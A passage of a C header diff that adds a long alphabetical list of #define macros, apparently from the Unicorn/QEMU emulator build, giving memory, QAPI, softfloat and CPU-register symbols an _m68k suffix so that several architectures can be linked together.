+#define last_ram_offset last_ram_offset_m68k +#define ldl_be_p ldl_be_p_m68k +#define ldl_be_phys ldl_be_phys_m68k +#define ldl_he_p ldl_he_p_m68k +#define ldl_le_p ldl_le_p_m68k +#define ldl_le_phys ldl_le_phys_m68k +#define ldl_phys ldl_phys_m68k +#define ldl_phys_internal ldl_phys_internal_m68k +#define ldq_be_p ldq_be_p_m68k +#define ldq_be_phys ldq_be_phys_m68k +#define ldq_he_p ldq_he_p_m68k +#define ldq_le_p ldq_le_p_m68k +#define ldq_le_phys ldq_le_phys_m68k +#define ldq_phys ldq_phys_m68k +#define ldq_phys_internal ldq_phys_internal_m68k +#define ldst_name ldst_name_m68k +#define ldub_p ldub_p_m68k +#define ldub_phys ldub_phys_m68k +#define lduw_be_p lduw_be_p_m68k +#define lduw_be_phys lduw_be_phys_m68k +#define lduw_he_p lduw_he_p_m68k +#define lduw_le_p lduw_le_p_m68k +#define lduw_le_phys lduw_le_phys_m68k +#define lduw_phys lduw_phys_m68k +#define lduw_phys_internal lduw_phys_internal_m68k +#define le128 le128_m68k +#define linked_bp_matches linked_bp_matches_m68k +#define listener_add_address_space listener_add_address_space_m68k +#define load_cpu_offset load_cpu_offset_m68k +#define load_reg load_reg_m68k +#define load_reg_var load_reg_var_m68k +#define log_cpu_state log_cpu_state_m68k +#define lpae_cp_reginfo lpae_cp_reginfo_m68k +#define lt128 lt128_m68k +#define machine_class_init machine_class_init_m68k +#define machine_finalize machine_finalize_m68k +#define machine_info machine_info_m68k +#define machine_initfn machine_initfn_m68k +#define machine_register_types machine_register_types_m68k +#define machvirt_init machvirt_init_m68k +#define machvirt_machine_init machvirt_machine_init_m68k +#define maj maj_m68k +#define mapping_conflict mapping_conflict_m68k +#define mapping_contiguous mapping_contiguous_m68k +#define mapping_have_same_region mapping_have_same_region_m68k +#define mapping_merge mapping_merge_m68k +#define mem_add mem_add_m68k +#define mem_begin mem_begin_m68k +#define mem_commit mem_commit_m68k +#define memory_access_is_direct memory_access_is_direct_m68k +#define memory_access_size memory_access_size_m68k +#define memory_init memory_init_m68k +#define memory_listener_match memory_listener_match_m68k +#define memory_listener_register memory_listener_register_m68k +#define memory_listener_unregister memory_listener_unregister_m68k +#define memory_map_init memory_map_init_m68k +#define memory_mapping_filter memory_mapping_filter_m68k +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_m68k +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_m68k +#define memory_mapping_list_free memory_mapping_list_free_m68k +#define memory_mapping_list_init memory_mapping_list_init_m68k +#define memory_region_access_valid memory_region_access_valid_m68k +#define memory_region_add_subregion memory_region_add_subregion_m68k +#define memory_region_add_subregion_common memory_region_add_subregion_common_m68k +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_m68k +#define memory_region_big_endian memory_region_big_endian_m68k +#define memory_region_clear_pending memory_region_clear_pending_m68k +#define memory_region_del_subregion memory_region_del_subregion_m68k +#define memory_region_destructor_alias memory_region_destructor_alias_m68k +#define memory_region_destructor_none memory_region_destructor_none_m68k +#define memory_region_destructor_ram memory_region_destructor_ram_m68k +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_m68k +#define memory_region_dispatch_read memory_region_dispatch_read_m68k +#define memory_region_dispatch_read1 memory_region_dispatch_read1_m68k +#define memory_region_dispatch_write memory_region_dispatch_write_m68k +#define memory_region_escape_name memory_region_escape_name_m68k +#define memory_region_finalize memory_region_finalize_m68k +#define memory_region_find memory_region_find_m68k +#define memory_region_get_addr memory_region_get_addr_m68k +#define memory_region_get_alignment memory_region_get_alignment_m68k +#define memory_region_get_container memory_region_get_container_m68k +#define memory_region_get_fd memory_region_get_fd_m68k +#define memory_region_get_may_overlap memory_region_get_may_overlap_m68k +#define memory_region_get_priority memory_region_get_priority_m68k +#define memory_region_get_ram_addr memory_region_get_ram_addr_m68k +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_m68k +#define memory_region_get_size memory_region_get_size_m68k +#define memory_region_info memory_region_info_m68k +#define memory_region_init memory_region_init_m68k +#define memory_region_init_alias memory_region_init_alias_m68k +#define memory_region_initfn memory_region_initfn_m68k +#define memory_region_init_io memory_region_init_io_m68k +#define memory_region_init_ram memory_region_init_ram_m68k +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_m68k +#define memory_region_init_reservation memory_region_init_reservation_m68k +#define memory_region_is_iommu memory_region_is_iommu_m68k +#define memory_region_is_logging memory_region_is_logging_m68k +#define memory_region_is_mapped memory_region_is_mapped_m68k +#define memory_region_is_ram memory_region_is_ram_m68k +#define memory_region_is_rom memory_region_is_rom_m68k +#define memory_region_is_romd memory_region_is_romd_m68k +#define memory_region_is_skip_dump memory_region_is_skip_dump_m68k +#define memory_region_is_unassigned memory_region_is_unassigned_m68k +#define memory_region_name memory_region_name_m68k +#define memory_region_need_escape memory_region_need_escape_m68k +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_m68k +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_m68k +#define memory_region_present memory_region_present_m68k +#define memory_region_read_accessor memory_region_read_accessor_m68k +#define memory_region_readd_subregion memory_region_readd_subregion_m68k +#define memory_region_ref memory_region_ref_m68k +#define memory_region_resolve_container memory_region_resolve_container_m68k +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_m68k +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_m68k +#define memory_region_set_address memory_region_set_address_m68k +#define memory_region_set_alias_offset memory_region_set_alias_offset_m68k +#define memory_region_set_enabled memory_region_set_enabled_m68k +#define memory_region_set_readonly memory_region_set_readonly_m68k +#define memory_region_set_skip_dump memory_region_set_skip_dump_m68k +#define memory_region_size memory_region_size_m68k +#define memory_region_to_address_space memory_region_to_address_space_m68k +#define memory_region_transaction_begin memory_region_transaction_begin_m68k +#define memory_region_transaction_commit memory_region_transaction_commit_m68k +#define memory_region_unref memory_region_unref_m68k +#define memory_region_update_container_subregions memory_region_update_container_subregions_m68k +#define memory_region_write_accessor memory_region_write_accessor_m68k +#define memory_region_wrong_endianness memory_region_wrong_endianness_m68k +#define memory_try_enable_merging memory_try_enable_merging_m68k +#define module_call_init module_call_init_m68k +#define module_load module_load_m68k +#define mpidr_cp_reginfo mpidr_cp_reginfo_m68k +#define mpidr_read mpidr_read_m68k +#define msr_mask msr_mask_m68k +#define mul128By64To192 mul128By64To192_m68k +#define mul128To256 mul128To256_m68k +#define mul64To128 mul64To128_m68k +#define muldiv64 muldiv64_m68k +#define neon_2rm_is_float_op neon_2rm_is_float_op_m68k +#define neon_2rm_sizes neon_2rm_sizes_m68k +#define neon_3r_sizes neon_3r_sizes_m68k +#define neon_get_scalar neon_get_scalar_m68k +#define neon_load_reg neon_load_reg_m68k +#define neon_load_reg64 neon_load_reg64_m68k +#define neon_load_scratch neon_load_scratch_m68k +#define neon_ls_element_type neon_ls_element_type_m68k +#define neon_reg_offset neon_reg_offset_m68k +#define neon_store_reg neon_store_reg_m68k +#define neon_store_reg64 neon_store_reg64_m68k +#define neon_store_scratch neon_store_scratch_m68k +#define new_ldst_label new_ldst_label_m68k +#define next_list next_list_m68k +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_m68k +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_m68k +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_m68k +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_m68k +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_m68k +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_m68k +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_m68k +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_m68k +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_m68k +#define not_v6_cp_reginfo not_v6_cp_reginfo_m68k +#define not_v7_cp_reginfo not_v7_cp_reginfo_m68k +#define not_v8_cp_reginfo not_v8_cp_reginfo_m68k +#define object_child_foreach object_child_foreach_m68k +#define object_class_foreach object_class_foreach_m68k +#define object_class_foreach_tramp object_class_foreach_tramp_m68k +#define object_class_get_list object_class_get_list_m68k +#define object_class_get_list_tramp object_class_get_list_tramp_m68k +#define object_class_get_parent object_class_get_parent_m68k +#define object_deinit object_deinit_m68k +#define object_dynamic_cast object_dynamic_cast_m68k +#define object_finalize object_finalize_m68k +#define object_finalize_child_property object_finalize_child_property_m68k +#define object_get_child_property object_get_child_property_m68k +#define object_get_link_property object_get_link_property_m68k +#define object_get_root object_get_root_m68k +#define object_initialize_with_type object_initialize_with_type_m68k +#define object_init_with_type object_init_with_type_m68k +#define object_instance_init object_instance_init_m68k +#define object_new_with_type object_new_with_type_m68k +#define object_post_init_with_type object_post_init_with_type_m68k +#define object_property_add_alias object_property_add_alias_m68k +#define object_property_add_link object_property_add_link_m68k +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_m68k +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_m68k +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_m68k +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_m68k +#define object_property_allow_set_link object_property_allow_set_link_m68k +#define object_property_del object_property_del_m68k +#define object_property_del_all object_property_del_all_m68k +#define object_property_find object_property_find_m68k +#define object_property_get object_property_get_m68k +#define object_property_get_bool object_property_get_bool_m68k +#define object_property_get_int object_property_get_int_m68k +#define object_property_get_link object_property_get_link_m68k +#define object_property_get_qobject object_property_get_qobject_m68k +#define object_property_get_str object_property_get_str_m68k +#define object_property_get_type object_property_get_type_m68k +#define object_property_is_child object_property_is_child_m68k +#define object_property_set object_property_set_m68k +#define object_property_set_description object_property_set_description_m68k +#define object_property_set_link object_property_set_link_m68k +#define object_property_set_qobject object_property_set_qobject_m68k +#define object_release_link_property object_release_link_property_m68k +#define object_resolve_abs_path object_resolve_abs_path_m68k +#define object_resolve_child_property object_resolve_child_property_m68k +#define object_resolve_link object_resolve_link_m68k +#define object_resolve_link_property object_resolve_link_property_m68k +#define object_resolve_partial_path object_resolve_partial_path_m68k +#define object_resolve_path object_resolve_path_m68k +#define object_resolve_path_component object_resolve_path_component_m68k +#define object_resolve_path_type object_resolve_path_type_m68k +#define object_set_link_property object_set_link_property_m68k +#define object_unparent object_unparent_m68k +#define omap_cachemaint_write omap_cachemaint_write_m68k +#define omap_cp_reginfo omap_cp_reginfo_m68k +#define omap_threadid_write omap_threadid_write_m68k +#define omap_ticonfig_write omap_ticonfig_write_m68k +#define omap_wfi_write omap_wfi_write_m68k +#define op_bits op_bits_m68k +#define open_modeflags open_modeflags_m68k +#define op_to_mov op_to_mov_m68k +#define op_to_movi op_to_movi_m68k +#define output_type_enum output_type_enum_m68k +#define packFloat128 packFloat128_m68k +#define packFloat16 packFloat16_m68k +#define packFloat32 packFloat32_m68k +#define packFloat64 packFloat64_m68k +#define packFloatx80 packFloatx80_m68k +#define page_find page_find_m68k +#define page_find_alloc page_find_alloc_m68k +#define page_flush_tb page_flush_tb_m68k +#define page_flush_tb_1 page_flush_tb_1_m68k +#define page_init page_init_m68k +#define page_size_init page_size_init_m68k +#define par par_m68k +#define parse_array parse_array_m68k +#define parse_error parse_error_m68k +#define parse_escape parse_escape_m68k +#define parse_keyword parse_keyword_m68k +#define parse_literal parse_literal_m68k +#define parse_object parse_object_m68k +#define parse_optional parse_optional_m68k +#define parse_option_bool parse_option_bool_m68k +#define parse_option_number parse_option_number_m68k +#define parse_option_size parse_option_size_m68k +#define parse_pair parse_pair_m68k +#define parser_context_free parser_context_free_m68k +#define parser_context_new parser_context_new_m68k +#define parser_context_peek_token parser_context_peek_token_m68k +#define parser_context_pop_token parser_context_pop_token_m68k +#define parser_context_restore parser_context_restore_m68k +#define parser_context_save parser_context_save_m68k +#define parse_str parse_str_m68k +#define parse_type_bool parse_type_bool_m68k +#define parse_type_int parse_type_int_m68k +#define parse_type_number parse_type_number_m68k +#define parse_type_size parse_type_size_m68k +#define parse_type_str parse_type_str_m68k +#define parse_value parse_value_m68k +#define par_write par_write_m68k +#define patch_reloc patch_reloc_m68k +#define phys_map_node_alloc phys_map_node_alloc_m68k +#define phys_map_node_reserve phys_map_node_reserve_m68k +#define phys_mem_alloc phys_mem_alloc_m68k +#define phys_mem_set_alloc phys_mem_set_alloc_m68k +#define phys_page_compact phys_page_compact_m68k +#define phys_page_compact_all phys_page_compact_all_m68k +#define phys_page_find phys_page_find_m68k +#define phys_page_set phys_page_set_m68k +#define phys_page_set_level phys_page_set_level_m68k +#define phys_section_add phys_section_add_m68k +#define phys_section_destroy phys_section_destroy_m68k +#define phys_sections_free phys_sections_free_m68k +#define pickNaN pickNaN_m68k +#define pickNaNMulAdd pickNaNMulAdd_m68k +#define pmccfiltr_write pmccfiltr_write_m68k +#define pmccntr_read pmccntr_read_m68k +#define pmccntr_sync pmccntr_sync_m68k +#define pmccntr_write pmccntr_write_m68k +#define pmccntr_write32 pmccntr_write32_m68k +#define pmcntenclr_write pmcntenclr_write_m68k +#define pmcntenset_write pmcntenset_write_m68k +#define pmcr_write pmcr_write_m68k +#define pmintenclr_write pmintenclr_write_m68k +#define pmintenset_write pmintenset_write_m68k +#define pmovsr_write pmovsr_write_m68k +#define pmreg_access pmreg_access_m68k +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_m68k +#define pmsav5_data_ap_read pmsav5_data_ap_read_m68k +#define pmsav5_data_ap_write pmsav5_data_ap_write_m68k +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_m68k +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_m68k +#define pmuserenr_write pmuserenr_write_m68k +#define pmxevtyper_write pmxevtyper_write_m68k +#define print_type_bool print_type_bool_m68k +#define print_type_int print_type_int_m68k +#define print_type_number print_type_number_m68k +#define print_type_size print_type_size_m68k +#define print_type_str print_type_str_m68k +#define propagateFloat128NaN propagateFloat128NaN_m68k +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_m68k +#define propagateFloat32NaN propagateFloat32NaN_m68k +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_m68k +#define propagateFloat64NaN propagateFloat64NaN_m68k +#define propagateFloatx80NaN propagateFloatx80NaN_m68k +#define property_get_alias property_get_alias_m68k +#define property_get_bool property_get_bool_m68k +#define property_get_str property_get_str_m68k +#define property_get_uint16_ptr property_get_uint16_ptr_m68k +#define property_get_uint32_ptr property_get_uint32_ptr_m68k +#define property_get_uint64_ptr property_get_uint64_ptr_m68k +#define property_get_uint8_ptr property_get_uint8_ptr_m68k +#define property_release_alias property_release_alias_m68k +#define property_release_bool property_release_bool_m68k +#define property_release_str property_release_str_m68k +#define property_resolve_alias property_resolve_alias_m68k +#define property_set_alias property_set_alias_m68k +#define property_set_bool property_set_bool_m68k +#define property_set_str property_set_str_m68k +#define pstate_read pstate_read_m68k +#define pstate_write pstate_write_m68k +#define pxa250_initfn pxa250_initfn_m68k +#define pxa255_initfn pxa255_initfn_m68k +#define pxa260_initfn pxa260_initfn_m68k +#define pxa261_initfn pxa261_initfn_m68k +#define pxa262_initfn pxa262_initfn_m68k +#define pxa270a0_initfn pxa270a0_initfn_m68k +#define pxa270a1_initfn pxa270a1_initfn_m68k +#define pxa270b0_initfn pxa270b0_initfn_m68k +#define pxa270b1_initfn pxa270b1_initfn_m68k +#define pxa270c0_initfn pxa270c0_initfn_m68k +#define pxa270c5_initfn pxa270c5_initfn_m68k +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_m68k +#define qapi_dealloc_end_list qapi_dealloc_end_list_m68k +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_m68k +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_m68k +#define qapi_dealloc_next_list qapi_dealloc_next_list_m68k +#define qapi_dealloc_pop qapi_dealloc_pop_m68k +#define qapi_dealloc_push qapi_dealloc_push_m68k +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_m68k +#define qapi_dealloc_start_list qapi_dealloc_start_list_m68k +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_m68k +#define qapi_dealloc_start_union qapi_dealloc_start_union_m68k +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_m68k +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_m68k +#define qapi_dealloc_type_int qapi_dealloc_type_int_m68k +#define qapi_dealloc_type_number qapi_dealloc_type_number_m68k +#define qapi_dealloc_type_size qapi_dealloc_type_size_m68k +#define qapi_dealloc_type_str qapi_dealloc_type_str_m68k +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_m68k +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_m68k +#define qapi_free_boolList qapi_free_boolList_m68k +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_m68k +#define qapi_free_int16List qapi_free_int16List_m68k +#define qapi_free_int32List qapi_free_int32List_m68k +#define qapi_free_int64List qapi_free_int64List_m68k +#define qapi_free_int8List qapi_free_int8List_m68k +#define qapi_free_intList qapi_free_intList_m68k +#define qapi_free_numberList qapi_free_numberList_m68k +#define qapi_free_strList qapi_free_strList_m68k +#define qapi_free_uint16List qapi_free_uint16List_m68k +#define qapi_free_uint32List qapi_free_uint32List_m68k +#define qapi_free_uint64List qapi_free_uint64List_m68k +#define qapi_free_uint8List qapi_free_uint8List_m68k +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_m68k +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_m68k +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_m68k +#define qbool_destroy_obj qbool_destroy_obj_m68k +#define qbool_from_int qbool_from_int_m68k +#define qbool_get_int qbool_get_int_m68k +#define qbool_type qbool_type_m68k +#define qbus_create qbus_create_m68k +#define qbus_create_inplace qbus_create_inplace_m68k +#define qbus_finalize qbus_finalize_m68k +#define qbus_initfn qbus_initfn_m68k +#define qbus_realize qbus_realize_m68k +#define qdev_create qdev_create_m68k +#define qdev_get_type qdev_get_type_m68k +#define qdev_register_types qdev_register_types_m68k +#define qdev_set_parent_bus qdev_set_parent_bus_m68k +#define qdev_try_create qdev_try_create_m68k +#define qdict_add_key qdict_add_key_m68k +#define qdict_array_split qdict_array_split_m68k +#define qdict_clone_shallow qdict_clone_shallow_m68k +#define qdict_del qdict_del_m68k +#define qdict_destroy_obj qdict_destroy_obj_m68k +#define qdict_entry_key qdict_entry_key_m68k +#define qdict_entry_value qdict_entry_value_m68k +#define qdict_extract_subqdict qdict_extract_subqdict_m68k +#define qdict_find qdict_find_m68k +#define qdict_first qdict_first_m68k +#define qdict_flatten qdict_flatten_m68k +#define qdict_flatten_qdict qdict_flatten_qdict_m68k +#define qdict_flatten_qlist qdict_flatten_qlist_m68k +#define qdict_get qdict_get_m68k +#define qdict_get_bool qdict_get_bool_m68k +#define qdict_get_double qdict_get_double_m68k +#define qdict_get_int qdict_get_int_m68k +#define qdict_get_obj qdict_get_obj_m68k +#define qdict_get_qdict qdict_get_qdict_m68k +#define qdict_get_qlist qdict_get_qlist_m68k +#define qdict_get_str qdict_get_str_m68k +#define qdict_get_try_bool qdict_get_try_bool_m68k +#define qdict_get_try_int qdict_get_try_int_m68k +#define qdict_get_try_str qdict_get_try_str_m68k +#define qdict_haskey qdict_haskey_m68k +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_m68k +#define qdict_iter qdict_iter_m68k +#define qdict_join qdict_join_m68k +#define qdict_new qdict_new_m68k +#define qdict_next qdict_next_m68k +#define qdict_next_entry qdict_next_entry_m68k +#define qdict_put_obj qdict_put_obj_m68k +#define qdict_size qdict_size_m68k +#define qdict_type qdict_type_m68k +#define qemu_clock_get_us qemu_clock_get_us_m68k +#define qemu_clock_ptr qemu_clock_ptr_m68k +#define qemu_clocks qemu_clocks_m68k +#define qemu_get_cpu qemu_get_cpu_m68k +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_m68k +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_m68k +#define qemu_get_ram_block qemu_get_ram_block_m68k +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_m68k +#define qemu_get_ram_fd qemu_get_ram_fd_m68k +#define qemu_get_ram_ptr qemu_get_ram_ptr_m68k +#define qemu_host_page_mask qemu_host_page_mask_m68k +#define qemu_host_page_size qemu_host_page_size_m68k +#define qemu_init_vcpu qemu_init_vcpu_m68k +#define qemu_ld_helpers qemu_ld_helpers_m68k +#define qemu_log_close qemu_log_close_m68k +#define qemu_log_enabled qemu_log_enabled_m68k +#define qemu_log_flush qemu_log_flush_m68k +#define qemu_loglevel_mask qemu_loglevel_mask_m68k +#define qemu_log_vprintf qemu_log_vprintf_m68k +#define qemu_oom_check qemu_oom_check_m68k +#define qemu_parse_fd qemu_parse_fd_m68k +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_m68k +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_m68k +#define qemu_ram_alloc qemu_ram_alloc_m68k +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_m68k +#define qemu_ram_foreach_block qemu_ram_foreach_block_m68k +#define qemu_ram_free qemu_ram_free_m68k +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_m68k +#define qemu_ram_ptr_length qemu_ram_ptr_length_m68k +#define qemu_ram_remap qemu_ram_remap_m68k +#define qemu_ram_setup_dump qemu_ram_setup_dump_m68k +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_m68k +#define qemu_real_host_page_size qemu_real_host_page_size_m68k +#define qemu_st_helpers qemu_st_helpers_m68k +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_m68k +#define qemu_try_memalign qemu_try_memalign_m68k +#define qentry_destroy qentry_destroy_m68k +#define qerror_human qerror_human_m68k +#define qerror_report qerror_report_m68k +#define qerror_report_err qerror_report_err_m68k +#define qfloat_destroy_obj qfloat_destroy_obj_m68k +#define qfloat_from_double qfloat_from_double_m68k +#define qfloat_get_double qfloat_get_double_m68k +#define qfloat_type qfloat_type_m68k +#define qint_destroy_obj qint_destroy_obj_m68k +#define qint_from_int qint_from_int_m68k +#define qint_get_int qint_get_int_m68k +#define qint_type qint_type_m68k +#define qlist_append_obj qlist_append_obj_m68k +#define qlist_copy qlist_copy_m68k +#define qlist_copy_elem qlist_copy_elem_m68k +#define qlist_destroy_obj qlist_destroy_obj_m68k +#define qlist_empty qlist_empty_m68k +#define qlist_entry_obj qlist_entry_obj_m68k +#define qlist_first qlist_first_m68k +#define qlist_iter qlist_iter_m68k +#define qlist_new qlist_new_m68k +#define qlist_next qlist_next_m68k +#define qlist_peek qlist_peek_m68k +#define qlist_pop qlist_pop_m68k +#define qlist_size qlist_size_m68k +#define qlist_size_iter qlist_size_iter_m68k +#define qlist_type qlist_type_m68k +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_m68k +#define qmp_input_end_list qmp_input_end_list_m68k +#define qmp_input_end_struct qmp_input_end_struct_m68k +#define qmp_input_get_next_type qmp_input_get_next_type_m68k +#define qmp_input_get_object qmp_input_get_object_m68k +#define qmp_input_get_visitor qmp_input_get_visitor_m68k +#define qmp_input_next_list qmp_input_next_list_m68k +#define qmp_input_optional qmp_input_optional_m68k +#define qmp_input_pop qmp_input_pop_m68k +#define qmp_input_push qmp_input_push_m68k +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_m68k +#define qmp_input_start_list qmp_input_start_list_m68k +#define qmp_input_start_struct qmp_input_start_struct_m68k +#define qmp_input_type_bool qmp_input_type_bool_m68k +#define qmp_input_type_int qmp_input_type_int_m68k +#define qmp_input_type_number qmp_input_type_number_m68k +#define qmp_input_type_str qmp_input_type_str_m68k +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_m68k +#define qmp_input_visitor_new qmp_input_visitor_new_m68k +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_m68k +#define qmp_output_add_obj qmp_output_add_obj_m68k +#define qmp_output_end_list qmp_output_end_list_m68k +#define qmp_output_end_struct qmp_output_end_struct_m68k +#define qmp_output_first qmp_output_first_m68k +#define qmp_output_get_qobject qmp_output_get_qobject_m68k +#define qmp_output_get_visitor qmp_output_get_visitor_m68k +#define qmp_output_last qmp_output_last_m68k +#define qmp_output_next_list qmp_output_next_list_m68k +#define qmp_output_pop qmp_output_pop_m68k +#define qmp_output_push_obj qmp_output_push_obj_m68k +#define qmp_output_start_list qmp_output_start_list_m68k +#define qmp_output_start_struct qmp_output_start_struct_m68k +#define qmp_output_type_bool qmp_output_type_bool_m68k +#define qmp_output_type_int qmp_output_type_int_m68k +#define qmp_output_type_number qmp_output_type_number_m68k +#define qmp_output_type_str qmp_output_type_str_m68k +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_m68k +#define qmp_output_visitor_new qmp_output_visitor_new_m68k +#define qobject_decref qobject_decref_m68k +#define qobject_to_qbool qobject_to_qbool_m68k +#define qobject_to_qdict qobject_to_qdict_m68k +#define qobject_to_qfloat qobject_to_qfloat_m68k +#define qobject_to_qint qobject_to_qint_m68k +#define qobject_to_qlist qobject_to_qlist_m68k +#define qobject_to_qstring qobject_to_qstring_m68k +#define qobject_type qobject_type_m68k +#define qstring_append qstring_append_m68k +#define qstring_append_chr qstring_append_chr_m68k +#define qstring_append_int qstring_append_int_m68k +#define qstring_destroy_obj qstring_destroy_obj_m68k +#define qstring_from_escaped_str qstring_from_escaped_str_m68k +#define qstring_from_str qstring_from_str_m68k +#define qstring_from_substr qstring_from_substr_m68k +#define qstring_get_length qstring_get_length_m68k +#define qstring_get_str qstring_get_str_m68k +#define qstring_new qstring_new_m68k +#define qstring_type qstring_type_m68k +#define ram_block_add ram_block_add_m68k +#define ram_size ram_size_m68k +#define range_compare range_compare_m68k +#define range_covers_byte range_covers_byte_m68k +#define range_get_last range_get_last_m68k +#define range_merge range_merge_m68k +#define ranges_can_merge ranges_can_merge_m68k +#define raw_read raw_read_m68k +#define raw_write raw_write_m68k +#define rcon rcon_m68k +#define read_raw_cp_reg read_raw_cp_reg_m68k +#define recip_estimate recip_estimate_m68k +#define recip_sqrt_estimate recip_sqrt_estimate_m68k +#define register_cp_regs_for_features register_cp_regs_for_features_m68k +#define register_multipage register_multipage_m68k +#define register_subpage register_subpage_m68k +#define register_tm_clones register_tm_clones_m68k +#define register_types_object register_types_object_m68k +#define regnames regnames_m68k +#define render_memory_region render_memory_region_m68k +#define reset_all_temps reset_all_temps_m68k +#define reset_temp reset_temp_m68k +#define rol32 rol32_m68k +#define rol64 rol64_m68k +#define ror32 ror32_m68k +#define ror64 ror64_m68k +#define roundAndPackFloat128 roundAndPackFloat128_m68k +#define roundAndPackFloat16 roundAndPackFloat16_m68k +#define roundAndPackFloat32 roundAndPackFloat32_m68k +#define roundAndPackFloat64 roundAndPackFloat64_m68k +#define roundAndPackFloatx80 roundAndPackFloatx80_m68k +#define roundAndPackInt32 roundAndPackInt32_m68k +#define roundAndPackInt64 roundAndPackInt64_m68k +#define roundAndPackUint64 roundAndPackUint64_m68k +#define round_to_inf round_to_inf_m68k +#define run_on_cpu run_on_cpu_m68k +#define s0 s0_m68k +#define S0 S0_m68k +#define s1 s1_m68k +#define S1 S1_m68k +#define sa1100_initfn sa1100_initfn_m68k +#define sa1110_initfn sa1110_initfn_m68k +#define save_globals save_globals_m68k +#define scr_write scr_write_m68k +#define sctlr_write sctlr_write_m68k +#define set_bit set_bit_m68k +#define set_bits set_bits_m68k +#define set_default_nan_mode set_default_nan_mode_m68k +#define set_feature set_feature_m68k +#define set_float_detect_tininess set_float_detect_tininess_m68k +#define set_float_exception_flags set_float_exception_flags_m68k +#define set_float_rounding_mode set_float_rounding_mode_m68k +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_m68k +#define set_flush_to_zero set_flush_to_zero_m68k +#define set_swi_errno set_swi_errno_m68k +#define sextract32 sextract32_m68k +#define sextract64 sextract64_m68k +#define shift128ExtraRightJamming shift128ExtraRightJamming_m68k +#define shift128Right shift128Right_m68k +#define shift128RightJamming shift128RightJamming_m68k +#define shift32RightJamming shift32RightJamming_m68k +#define shift64ExtraRightJamming shift64ExtraRightJamming_m68k +#define shift64RightJamming shift64RightJamming_m68k +#define shifter_out_im shifter_out_im_m68k +#define shortShift128Left shortShift128Left_m68k +#define shortShift192Left shortShift192Left_m68k +#define simple_mpu_ap_bits simple_mpu_ap_bits_m68k +#define size_code_gen_buffer size_code_gen_buffer_m68k +#define softmmu_lock_user softmmu_lock_user_m68k +#define softmmu_lock_user_string softmmu_lock_user_string_m68k +#define softmmu_tget32 softmmu_tget32_m68k +#define softmmu_tget8 softmmu_tget8_m68k +#define softmmu_tput32 softmmu_tput32_m68k +#define softmmu_unlock_user softmmu_unlock_user_m68k +#define sort_constraints sort_constraints_m68k +#define sp_el0_access sp_el0_access_m68k +#define spsel_read spsel_read_m68k +#define spsel_write spsel_write_m68k +#define start_list start_list_m68k +#define stb_p stb_p_m68k +#define stb_phys stb_phys_m68k +#define stl_be_p stl_be_p_m68k +#define stl_be_phys stl_be_phys_m68k +#define stl_he_p stl_he_p_m68k +#define stl_le_p stl_le_p_m68k +#define stl_le_phys stl_le_phys_m68k +#define stl_phys stl_phys_m68k +#define stl_phys_internal stl_phys_internal_m68k +#define stl_phys_notdirty stl_phys_notdirty_m68k +#define store_cpu_offset store_cpu_offset_m68k +#define store_reg store_reg_m68k +#define store_reg_bx store_reg_bx_m68k +#define store_reg_from_load store_reg_from_load_m68k +#define stq_be_p stq_be_p_m68k +#define stq_be_phys stq_be_phys_m68k +#define stq_he_p stq_he_p_m68k +#define stq_le_p stq_le_p_m68k +#define stq_le_phys 